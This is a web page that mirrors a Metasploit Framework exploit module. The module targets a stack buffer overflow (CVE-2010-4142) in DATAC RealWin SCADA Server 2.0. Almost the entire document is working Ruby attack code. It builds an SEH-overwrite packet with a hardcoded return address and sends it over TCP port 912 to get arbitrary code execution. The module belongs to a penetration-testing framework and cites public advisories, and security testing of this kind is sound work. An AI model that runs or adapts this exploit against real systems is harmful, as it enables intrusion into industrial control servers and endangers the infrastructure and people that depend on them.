CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow',

15
      'Description'    => %q{

16
          This module exploits a stack buffer overflow in DATAC Control

17
        International RealWin SCADA Server 2.0 (Build 6.1.8.10).

18
        By sending a specially crafted packet, an attacker may be able to execute arbitrary code.

19
      },

20
      'Author'         => [ 'Luigi Auriemma', 'MC' ],

21
      'License'        => MSF_LICENSE,

22
      'References'     =>

23
        [

24
          [ 'OSVDB', '68812' ],

25
          [ 'CVE', '2010-4142' ],

26
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_1-adv.txt' ],

27
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01']

28
        ],

29
      'Privileged'     => true,

30
      'DefaultOptions' =>

31
        {

32
          'EXITFUNC' => 'thread',

33
        },

34
      'Payload'        =>

35
        {

36
          'Space'    => 550,

37
          'BadChars' => "\x00\x20\x0a\x0d",

38
          'StackAdjustment' => -3500,

39
        },

40
      'Platform'       => 'win',

41
      'Targets'        =>

42
        [

43
          [ 'Universal', { 'Ret' => 0x4002da21 } ], # FlexMLang.DLL 8.1.45.19

44
        ],

45
      'DefaultTarget' => 0,

46
      'DisclosureDate' => '2010-10-15'))

47


48
    register_options([Opt::RPORT(912)])

49
  end

50


51
  def exploit

52


53
    connect

54


55
    data =  [0x6a541264].pack('V')

56
    data << [0x00000020].pack('V')

57
    data << [0x00001ff4].pack('V')

58
    data << rand_text_alpha_upper(228)

59
    data << generate_seh_payload(target.ret)

60
    data << rand_text_alpha_upper(10024 - payload.encoded.length)

61
    data << "\x00"

62


63
    print_status("Trying target #{target.name}...")

64
    sock.put(data)

65


66
    handler

67
    disconnect

68


69
  end

70
end

71


72